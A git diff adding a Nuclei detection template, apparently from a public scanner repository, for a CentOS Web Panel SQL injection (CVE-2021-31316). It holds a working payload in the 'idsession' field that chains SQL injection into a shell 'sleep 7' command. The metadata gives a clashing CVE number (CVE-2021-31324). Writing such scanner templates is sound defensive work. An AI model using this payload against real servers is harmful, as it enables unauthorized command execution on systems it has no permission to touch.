projectdiscovery · DhiyaneshGeek · Jan 20, 2025 · Jan 16, 2025
diff --git a/http/cves/2021/CVE-2021-31316.yaml b/http/cves/2021/CVE-2021-31316.yaml
@@ -0,0 +1,53 @@
+id: CVE-2021-31316
+
+info:
+  name: CentOS Web Panel - SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    The unprivileged user portal part of CentOS Web Panel is affected by a SQL Injection via the 'idsession' HTTP POST parameter.
+  reference:
+    - https://www.shielder.com/advisories/centos-web-panel-idsession-root-rce/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-31316
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-31324
+    cwe-id: CWE-89
+    cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:*
+  metadata:
+    vendor: control-webpanel
+    product: webpanel
+    shodan-query: title:"Login | Control WebPanel"
+    fofa-query: title="Login | Control WebPanel"
+  tags: cve,cve2021,centos,cwpsrv,sqli
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(header, "cwpsrv")'
+        internal: true
+
+  - raw:
+      - |
+        POST /login/index.php?acc=newpass HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        pass1=c3VwZXJwYXNzd29yZA%3D%3D&idsession=a'%20UNION%20SELECT'a'%2c'b'%2c'c'%2c'YWJjIiBVTklPTiBTRUxFQ1QgJ2EnLCdiJywnYycsJ2QnLCcrMSBkYXknLCdmJy0tIHAiO3NsZWVwIDc7I2B8fGF8fGJ8fGN8fGQ%3d'%2c'e'%2c'f'-- p
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=7'
+          - 'status_code == 200'
+          - 'contains(response, "Control WebPanel")'
+        condition: and